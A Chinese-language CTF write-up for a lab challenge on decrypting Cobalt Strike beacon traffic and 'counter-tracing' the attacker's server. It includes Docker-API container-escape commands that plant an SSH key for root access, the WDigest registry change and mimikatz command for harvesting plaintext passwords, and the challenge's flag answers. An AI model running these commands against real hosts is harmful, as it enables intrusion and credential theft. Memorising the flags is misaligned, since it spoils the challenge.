CobaltStrike流量分析

CobaltStrike流量分析

题目信息

题目名：CobaltStrike流量分析

难度：困难

连接信息：

• 无

知识点

1.溯源反制

2.DockerAPI未授权

3.CobaltStrike流量分析

‍

题目简介

某单位安全运维人员在夜间捕获了一个数据包和一个恶意IP，请你分析数据包结合IP回答相应问题

解题步骤

1.溯源反制，提交黑客CS服务器的flag.txt内容

fscan扫描发现docker api未授权漏洞，还开了ssh

​

发现有一个镜像

1

$ docker  -H tcp://192.168.31.170 images

​

启动一个容器 映射根到mnt目录

1

$ docker  -H tcp://192.168.31.170 run -it -v /:/mnt nginx:latest /bin/bash

然后写一个公钥

1
2
3

tee authorized_keys <<-'EOF'
ssh public key
EOF

然后ssh root@ip登录即可

查看flag

​

在/opt/目录发现cs服务端，得到.cobaltstrike.beacon_keys

1

flag{6750ac374fdc3038a67e95e1f21d455c}

2.黑客攻击主机上线时间是？(flag{YYYY-MM-DD HH:MM:SS})

过滤http，发现有application/octet-stream类型的消息，而且还有POST /submit.php类型的url符合cs基本特征

​

两次请求间隔1分钟，也符合cs默认上线sleep时间

​

​

第一次请求时间提交即可

​

1

flag{2025-2-12 20:12:52}

3.黑客使用的隧道payload名字是什么？

有了.cobaltstrike.beacon_keys后续通过https://github.com/minhangxiaohui/CSthing工具分析即可

​

1

flag{windows-beacon_http-reverse_http}

4.黑客获取到当前用户的明文密码是什么？

得到CS通信时的cookie

​

使用cobaltstrikekey和cookie分析得到RAWkey

​

指定rawkey分析数据包

1

$ python3 cs-parse-traffic.py -r a4553adf7a841e1dcf708afc912275ee ~/CTF/玄机cs流量解密/cs流量分析.pcapng > 1.log

这里进行了hashdump拿到了所有用户的hash

​

第一次通过mimikatz sekurlsa::logonpasswords​是没有拿到密码的

​

然后修改注册表后锁屏后等待用户登录

​

​

这时才拿到密码

​

1

flag{xj@cs123}

5.黑客为了得到明文密码修改了什么？（提交flag{md5(执行的命令)}）

上题可知

然后修改注册表后锁屏后等待用户登录

​

1
2

flag{md5( /C reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f)}
flag{73aeb8ee98d124a1f8e87f7965dc0b4a}

6.黑客下载的文件名称是什么？

往下看找到

​

1

flag{xxx服务器运维信息.xlsx}

7.黑客下载的文件内容是什么？

修改脚本提取出解密后的下载数据保存到本地，010打开发现是office文档，根据下载名字得到是xlsx，修改后缀即可

​

得到flag

​

1

flag{752fe2f44306e782f0d6830faad59e0e}

8.黑客上传的文件内容是什么？

相同的方式提取upload，发现是png文件

​

注意这里是分段传输，按顺序拼接一下删除多余文件头即可

​

分段拼接恢复后得到flag

​

1

flag{Hacker}

9.黑客截图后获取到用户正在使用哪个软件？（提交程序名称如firefox）

​

1

flag{chrome}

10.黑客读取到浏览器保存的密码是什么？

​

1

flag{0f338a1a6ad8785cee2b471d9d3e9f91}

11.黑客使用键盘记录获取到用户打开了什么网站？（提交网站域名）

​

1

flag{xj.edisec.net}

‍